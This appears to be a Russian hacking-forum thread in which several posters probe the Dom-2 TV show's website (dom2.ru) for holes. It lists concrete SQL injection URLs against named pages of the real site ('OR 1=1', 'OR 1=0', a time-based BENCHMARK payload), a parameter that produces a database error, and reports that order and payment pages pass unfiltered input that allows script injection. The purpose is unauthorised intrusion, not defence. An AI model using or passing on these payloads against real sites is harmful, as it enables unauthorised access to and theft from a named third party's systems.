1)_http://connect.dom2.ru/view/user/index.do?id=3763'32 репорт об ошибке 2)_http://www.dom2.ru/shop/index.phtml?prod=55) Добился чего-то) Вроде как полноценная SQL 3)_http://www.dom2.ru/shop/index.phtml?prod=55 OR 1=1 _http://www.dom2.ru/shop/index.phtml?prod=55 OR 1=0 разные значения выводятся... Продолжаю поиски....
4-я поинтересней, но ИМХО с её помощью тоже ничего к сожалению не поделаешь... Админы дома 2 тоже не такие уж и дураки... +-------------------------------------------------------+ | _http://www.dom2.ru/shop/index.phtml?prod=55 OR 1=1 | | _http://www.dom2.ru/shop/index.phtml?prod=55 OR 1=1 | +-------------------------------------------------------+ Не пойму, в чём тут разница...
По адресу __http://www.dom2.ru/shop/order.phtml не фильтруются вводимые поля, пропускает все теги и по адресу __http://www.dom2.ru/shop/confirmpay.phtml алерт вылетает свободно... Как обстоит дело на той стороне, когда заказ послан, хз... 2 SanyaX Толку 0 ....
http://www2.dom2.ru/shop/?cat=.index.phtml короче если такую шляпу ввести,то Query Error! Unknown table 'index' in where clause
Тут давно читал как Дом-2 ломали,так ием кто ломал пришлось сперва свалить Севант ТНТ потом ещё какой-то,я не помню(ГОЛОД чтоль?!) а потом они уже до дома дошли....
http://www.dom2.ru/journal/index.phtml?day=BENCHMARK(10000000,BENCHMARK(10000000,md5(current_date))) Выходит "error", но думаю, что это ничего не даст =(
